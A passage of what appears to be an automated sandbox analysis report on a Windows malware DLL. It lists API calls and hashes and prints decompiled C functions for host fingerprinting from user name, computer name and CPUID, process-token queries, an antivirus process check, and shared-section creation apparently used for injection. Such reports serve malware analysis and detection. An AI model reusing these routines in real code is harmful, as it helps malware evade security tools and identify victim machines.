                                                              • Part of subcall function 6E4B1C6F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E4B1A30,73B763F0,00000000), ref: 6E4B1C7E
                                                              • Part of subcall function 6E4B1C6F: GetVersion.KERNEL32 ref: 6E4B1C8D
                                                              • Part of subcall function 6E4B1C6F: GetCurrentProcessId.KERNEL32 ref: 6E4B1C9C
                                                              • Part of subcall function 6E4B1C6F: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E4B1CB5
                                                            • NtQuerySystemInformation.NTDLL(00000008,?,00000138,?), ref: 6E4B1A53
                                                              • Part of subcall function 6E4B18A0: VirtualAlloc.KERNELBASE(00000000,6E4B1A70,00003000,00000004,?,?,6E4B1A70,00000001), ref: 6E4B18F6
                                                              • Part of subcall function 6E4B18A0: memcpy.NTDLL(?,?,6E4B1A70,?,?,6E4B1A70,00000001), ref: 6E4B1991
                                                              • Part of subcall function 6E4B18A0: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6E4B1A70,00000001), ref: 6E4B19AC
                                                            • Sleep.KERNELBASE(00000001,00000001), ref: 6E4B1A78
                                                            • GetLongPathNameW.KERNELBASE ref: 6E4B1AC0
                                                            • GetLongPathNameW.KERNELBASE ref: 6E4B1ADE
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,6E4B1CDB,?,00000000), ref: 6E4B1B10
                                                            • GetExitCodeThread.KERNELBASE(00000000,?), ref: 6E4B1B24
                                                            • CloseHandle.KERNEL32(00000000), ref: 6E4B1B2B
                                                            • GetLastError.KERNEL32(6E4B1CDB,?,00000000), ref: 6E4B1B33
                                                            • GetLastError.KERNEL32 ref: 6E4B1B46
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLastLongNamePathProcessVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleInformationObjectOpenQuerySingleSleepSystemThreadVersionWaitmemcpy
                                                            • String ID:
                                                            • API String ID: 2016936029-0
                                                            • Opcode ID: d990133f7f08e286c5f58534f7112542ce46550c34a06d567992d81b3792b7fb
                                                            • Instruction ID: d45a9bf59d97b1126262781c4fc7447803b52ab00da9aa6c2254ee46e4e94093
                                                            • Opcode Fuzzy Hash: d990133f7f08e286c5f58534f7112542ce46550c34a06d567992d81b3792b7fb
                                                            • Instruction Fuzzy Hash: F531A371908711ABC740EFB99888E5BB7ECAF89750F10091BF554C3344E770E50987B2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E4B109B, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 69%
                                                            			E6E4B109B(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E4B2220();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e4b41d0;
				_push(_t15 + 0x6e4b505e);
				_push(_t15 + 0x6e4b5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E4B221A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6e4b41c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                                            0x6e4b109b
                                                            0x6e4b10a4
                                                            0x6e4b10a8
                                                            0x6e4b10ae
                                                            0x6e4b10b3
                                                            0x6e4b10b8
                                                            0x6e4b10bb
                                                            0x6e4b10be
                                                            0x6e4b10c3
                                                            0x6e4b10c4
                                                            0x6e4b10c7
                                                            0x6e4b10d2
                                                            0x6e4b10d9
                                                            0x6e4b10dd
                                                            0x6e4b10df
                                                            0x6e4b10e0
                                                            0x6e4b10e3
                                                            0x6e4b10e8
                                                            0x6e4b10f2
                                                            0x6e4b10f4
                                                            0x6e4b10f4
                                                            0x6e4b1108
                                                            0x6e4b110e
                                                            0x6e4b1112
                                                            0x6e4b1162
                                                            0x6e4b1114
                                                            0x6e4b111d
                                                            0x6e4b1133
                                                            0x6e4b113b
                                                            0x6e4b114d
                                                            0x6e4b1151
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b113d
                                                            0x6e4b1140
                                                            0x6e4b1145
                                                            0x6e4b1147
                                                            0x6e4b1147
                                                            0x6e4b1128
                                                            0x6e4b112a
                                                            0x6e4b1153
                                                            0x6e4b1154
                                                            0x6e4b1154
                                                            0x6e4b111d
                                                            0x6e4b116a

                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E4B10A8
                                                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E4B10BE
                                                            • _snwprintf.NTDLL ref: 6E4B10E3
                                                            • CreateFileMappingW.KERNELBASE(000000FF,6E4B41C0,00000004,00000000,?,?), ref: 6E4B1108
                                                            • GetLastError.KERNEL32 ref: 6E4B111F
                                                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E4B1133
                                                            • GetLastError.KERNEL32 ref: 6E4B114B
                                                            • CloseHandle.KERNEL32(00000000), ref: 6E4B1154
                                                            • GetLastError.KERNEL32 ref: 6E4B115C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                            • String ID:
                                                            • API String ID: 1724014008-0
                                                            • Opcode ID: 83308b737ff004b7ad0ca1e6b0a850f4c480396983dc5a579a8eea8f62ebf6f0
                                                            • Instruction ID: d7492c5b470a8a9eccd7e46ecba11dc3d4fa01c96a057bfe7780c394a8acb257
                                                            • Opcode Fuzzy Hash: 83308b737ff004b7ad0ca1e6b0a850f4c480396983dc5a579a8eea8f62ebf6f0
                                                            • Instruction Fuzzy Hash: 25215CB2940108BFDB01AFF9EC88E9E77ADEF49354F104026F615E7240D671AD498BB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045737F9, Relevance: 12.1, APIs: 8, Instructions: 114stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,0458C1AC,00000000), ref: 04573827
                                                            • StrRChrA.SHLWAPI(049BA5B0,00000000,0000005C,00000000,00000001,00000000,0458C16C,00000000,?), ref: 0457383C
                                                            • _strupr.NTDLL ref: 04573852
                                                            • lstrlen.KERNEL32(049BA5B0), ref: 0457385A
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000001,00000000,0458C16C,00000000,?), ref: 045738DA
                                                            • RtlAddVectoredExceptionHandler.NTDLL(00000000,04570001), ref: 04573901
                                                            • GetLastError.KERNEL32(?), ref: 0457391B
                                                            • RtlRemoveVectoredExceptionHandler.NTDLL(01348118), ref: 04573931
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: DescriptorExceptionHandlerSecurityVectored$ConvertCreateErrorEventLastRemoveString_struprlstrlen
                                                            • String ID:
                                                            • API String ID: 1098824789-0
                                                            • Opcode ID: 4a4e6ee6bdb029a5582c3956d2e63ab6b40879bd5c536f339612ca07ff5264c2
                                                            • Instruction ID: 23e5bcb1798e548e48ad1d99e34c607f797ab2b72dc6fe582a5d64ea9561900f
                                                            • Opcode Fuzzy Hash: 4a4e6ee6bdb029a5582c3956d2e63ab6b40879bd5c536f339612ca07ff5264c2
                                                            • Instruction Fuzzy Hash: 7D3193729001159FE711AF74BC84A6E77A4F705764B11153DEA12F7241DA38AD48FBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD2E33, Relevance: 12.1, APIs: 8, Instructions: 102memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 96%
                                                            			E00DD2E33(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xdda2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E00DD3569( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xdda2d0 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xdda290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E00DD1D41(_v8 + _v8, _t63);
							}
							HeapFree( *0xdda290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xdda290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E00DD1D41(_v8 + _v8, _t63);
						}
						HeapFree( *0xdda290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                                                            0x00dd2e33
                                                            0x00dd2e3b
                                                            0x00dd2e41
                                                            0x00dd2e44
                                                            0x00dd2e47
                                                            0x00dd2e49
                                                            0x00dd2e4e
                                                            0x00dd2e4e
                                                            0x00dd2e54
                                                            0x00dd2e56
                                                            0x00dd2e63
                                                            0x00dd2ec4
                                                            0x00dd2e65
                                                            0x00dd2e6a
                                                            0x00dd2e70
                                                            0x00dd2e75
                                                            0x00dd2e83
                                                            0x00dd2e87
                                                            0x00dd2e96
                                                            0x00dd2e9d
                                                            0x00dd2ea4
                                                            0x00dd2ea4
                                                            0x00dd2eaf
                                                            0x00dd2eaf
                                                            0x00dd2e87
                                                            0x00dd2e75
                                                            0x00dd2ec6
                                                            0x00dd2ecc
                                                            0x00dd2ed6
                                                            0x00dd2ed8
                                                            0x00dd2edd
                                                            0x00dd2eec
                                                            0x00dd2ef0
                                                            0x00dd2efb
                                                            0x00dd2f02
                                                            0x00dd2f09
                                                            0x00dd2f09
                                                            0x00dd2f15
                                                            0x00dd2f15
                                                            0x00dd2ef0
                                                            0x00dd2f1e
                                                            0x00dd2f20
                                                            0x00dd2f23
                                                            0x00dd2f25
                                                            0x00dd2f28
                                                            0x00dd2f2b
                                                            0x00dd2f35
                                                            0x00dd2f39
                                                            0x00dd2f3d

                                                            APIs
                                                            • GetUserNameW.ADVAPI32(00000000,00DD5FA9), ref: 00DD2E6A
                                                            • RtlAllocateHeap.NTDLL(00000000,00DD5FA9), ref: 00DD2E81
                                                            • GetUserNameW.ADVAPI32(00000000,00DD5FA9), ref: 00DD2E8E
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00DD5FA9,?,?,?,?,?,00DD66FE,?,00000001), ref: 00DD2EAF
                                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DD2ED6
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00DD2EEA
                                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DD2EF7
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 00DD2F15
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: HeapName$AllocateComputerFreeUser
                                                            • String ID:
                                                            • API String ID: 3239747167-0
                                                            • Opcode ID: c58d4f5fc195a0e61a96d3449ec36dbe7c4fdf812a1b1efcfb2b7470f514cbd5
                                                            • Instruction ID: c69ab44fa557f1c4df08ee17bb8e362b881c1e20093e6c4bfeb04bc71b9ecb3b
                                                            • Opcode Fuzzy Hash: c58d4f5fc195a0e61a96d3449ec36dbe7c4fdf812a1b1efcfb2b7470f514cbd5
                                                            • Instruction Fuzzy Hash: 54310772A01209EFDB11DFA9DD81A7EBBF9FB58300F14842AE505D6360E731AE009B31
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456DE77, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtOpenProcess.NTDLL(00000000,00000400,?,00000000), ref: 0456DEBE
                                                            • NtOpenProcessToken.NTDLL(00000000,00000008,00000001), ref: 0456DED1
                                                            • NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 0456DEED
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 0456DF0A
                                                            • memcpy.NTDLL(00000000,00000000,0000001C), ref: 0456DF17
                                                            • NtClose.NTDLL(00000001), ref: 0456DF29
                                                            • NtClose.NTDLL(00000000), ref: 0456DF33
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                            • String ID:
                                                            • API String ID: 2575439697-0
                                                            • Opcode ID: 75676ce218a34f272b42a5f382b1f3290cb88daf2c55341004b081989274a43f
                                                            • Instruction ID: 3467277e939ddbe769c699a31dcb4123a420a74da33ffd375a8cc572a80991cc
                                                            • Opcode Fuzzy Hash: 75676ce218a34f272b42a5f382b1f3290cb88daf2c55341004b081989274a43f
                                                            • Instruction Fuzzy Hash: 11211972A00219BBDB019F95DC44ADEBFBDFF48750F10405AF902B6120DB759A48ABA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD22EC, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 38%
                                                            			E00DD22EC(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00DD77D7(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00DD77EC(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                            0x00dd22f9
                                                            0x00dd22fa
                                                            0x00dd22fb
                                                            0x00dd22fc
                                                            0x00dd22fd
                                                            0x00dd2301
                                                            0x00dd2308
                                                            0x00dd2317
                                                            0x00dd231a
                                                            0x00dd231d
                                                            0x00dd2324
                                                            0x00dd2327
                                                            0x00dd232a
                                                            0x00dd232d
                                                            0x00dd2330
                                                            0x00dd233b
                                                            0x00dd233d
                                                            0x00dd2346
                                                            0x00dd234e
                                                            0x00dd2350
                                                            0x00dd2362
                                                            0x00dd236c
                                                            0x00dd2370
                                                            0x00dd237f
                                                            0x00dd2383
                                                            0x00dd238c
                                                            0x00dd2394
                                                            0x00dd2394
                                                            0x00dd2396
                                                            0x00dd2396
                                                            0x00dd239e
                                                            0x00dd23a4
                                                            0x00dd23a8
                                                            0x00dd23a8
                                                            0x00dd23b3

                                                            APIs
                                                            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00DD2333
                                                            • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00DD2346
                                                            • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00DD2362
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00DD237F
                                                            • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00DD238C
                                                            • NtClose.NTDLL(00000000), ref: 00DD239E
                                                            • NtClose.NTDLL(00000000), ref: 00DD23A8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                            • String ID:
                                                            • API String ID: 2575439697-0
                                                            • Opcode ID: 3de366defee01c21a2d343a2c8c2a1fdf469285fa05a26c61ffb500716d0c47d
                                                            • Instruction ID: 2acd8bacdf0da88330179cdc5051622ba45fa955884225d501e0176c907e160c
                                                            • Opcode Fuzzy Hash: 3de366defee01c21a2d343a2c8c2a1fdf469285fa05a26c61ffb500716d0c47d
                                                            • Instruction Fuzzy Hash: C421F5B2901229BBDB11AF95CC45EDEBFBDEF08750F104066F904E6260D7729A459BB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04561305, Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 04561330
                                                            • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0456133D
                                                            • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 045613C9
                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 045613D4
                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 045613DD
                                                            • RtlExitUserThread.NTDLL(00000000), ref: 045613F2
                                                              • Part of subcall function 04562730: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0456136B,?), ref: 04562738
                                                              • Part of subcall function 04562730: GetVersion.KERNEL32 ref: 04562747
                                                              • Part of subcall function 04562730: GetCurrentProcessId.KERNEL32 ref: 04562756
                                                              • Part of subcall function 04562730: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04562773
                                                              • Part of subcall function 04575020: memcpy.NTDLL(00000000,00000000,?,?,00000000,00000001,?,?,00000000,?,?,?,?,04561379,?), ref: 0457507F
                                                              • Part of subcall function 0457B54C: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,0456138B,00000000,0458C16C,00000000), ref: 0457B572
                                                              • Part of subcall function 0457527F: OpenProcess.KERNEL32(00000400,00000000,?,00000000,00000000,?,?,045613A2,00000000,0458C16C,00000000,?), ref: 0457529A
                                                              • Part of subcall function 0457527F: IsWow64Process.KERNEL32(00000000,?,00000000,00000000,?,?,045613A2,00000000,0458C16C,00000000,?), ref: 045752AB
                                                              • Part of subcall function 0457527F: CloseHandle.KERNEL32(00000000,?,?,045613A2,00000000,0458C16C,00000000,?), ref: 045752BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Process$CreateFileHandleModuleOpenThreadTime$CloseCurrentEventExitHeaderHeapImageInformationNameQuerySystemUserVersionWow64memcpy
                                                            • String ID:
                                                            • API String ID: 3825956196-0
                                                            • Opcode ID: c1508d0f713b6e1009b448bbb7b789d8d8ac2158fb95f4e4a42374eb3627bc7f
                                                            • Instruction ID: 83e89594a58e2d67f5ad6f83fb8108c193a27b1d44b4e10113a0eb1a6a75ade2
                                                            • Opcode Fuzzy Hash: c1508d0f713b6e1009b448bbb7b789d8d8ac2158fb95f4e4a42374eb3627bc7f
                                                            • Instruction Fuzzy Hash: E031A071A00614EFCB21EF68ED84D7E77B8FB84754B100169E553EB641EA34AD44FBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD11B8, Relevance: 7.5, APIs: 5, Instructions: 41processCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD11B8() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300); // executed
					while(_t8 != 0) {
						_t9 =  *0xdda2d4; // 0x2bed5a8
						_t2 = _t9 + 0xddbde4; // 0x73617661
						if(StrStrIA( &_v264, _t2) != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}










                                                            0x00dd11c3
                                                            0x00dd11c8
                                                            0x00dd11cd
                                                            0x00dd11d1
                                                            0x00dd11db
                                                            0x00dd120c
                                                            0x00dd11e2
                                                            0x00dd11e7
                                                            0x00dd11fd
                                                            0x00dd1214
                                                            0x00dd11ff
                                                            0x00dd1207
                                                            0x00000000
                                                            0x00dd1207
                                                            0x00dd1215
                                                            0x00dd1216
                                                            0x00000000
                                                            0x00dd1216
                                                            0x00000000
                                                            0x00dd1210
                                                            0x00dd121c
                                                            0x00dd1221

                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00DD11C8
                                                            • Process32First.KERNEL32(00000000,?), ref: 00DD11DB
                                                            • StrStrIA.SHLWAPI(?,73617661,00000000,00000000), ref: 00DD11F5
                                                            • Process32Next.KERNEL32(00000000,?), ref: 00DD1207
                                                            • CloseHandle.KERNEL32(00000000), ref: 00DD1216
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 420147892-0
                                                            • Opcode ID: 08b54ebb9c76b071c201eef34593888d98ece8699138b0aeb5ee88de39ba2ea7
                                                            • Instruction ID: 9a0f5e88027499194f3f032ca88bc22a387b2f0f94482e55c2b2fca4cd7181cb
                                                            • Opcode Fuzzy Hash: 08b54ebb9c76b071c201eef34593888d98ece8699138b0aeb5ee88de39ba2ea7
                                                            • Instruction Fuzzy Hash: BAF0BB3A10212476D720E77A9C4AFEB7B6CDBD5310F0500A3F945D3201E775CA4586B9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E4B2013, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 72%
                                                            			E6E4B2013(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6E4B121F(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                            0x6e4b201c
                                                            0x6e4b2023
                                                            0x6e4b2024
                                                            0x6e4b2025
                                                            0x6e4b2026
                                                            0x6e4b2027
                                                            0x6e4b2038
                                                            0x6e4b203c
                                                            0x6e4b2050
                                                            0x6e4b2053
                                                            0x6e4b2056
                                                            0x6e4b205d
                                                            0x6e4b2060
                                                            0x6e4b2067
                                                            0x6e4b206a
                                                            0x6e4b206d
                                                            0x6e4b2070
                                                            0x6e4b2075
                                                            0x6e4b20b0
                                                            0x6e4b2077
                                                            0x6e4b207a
                                                            0x6e4b2080
                                                            0x6e4b2085
                                                            0x6e4b2089
                                                            0x6e4b20a7
                                                            0x6e4b208b
                                                            0x6e4b2092
                                                            0x6e4b20a0
                                                            0x6e4b20a0
                                                            0x6e4b2089
                                                            0x6e4b20b8

                                                            APIs
                                                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 6E4B2070
                                                              • Part of subcall function 6E4B121F: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 6E4B124C
                                                            • memset.NTDLL ref: 6E4B2092
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Section$CreateViewmemset
                                                            • String ID: @
                                                            • API String ID: 2533685722-2766056989
                                                            • Opcode ID: 30335dec29f88378c7f926de13ada1ea94910b89b6dc03b9477e7fe4fe8ef42a
                                                            • Instruction ID: c47d038c464b31fd8b92ce26094c60ea6852df86d7d2e4ff3bc06de5ef7effcd
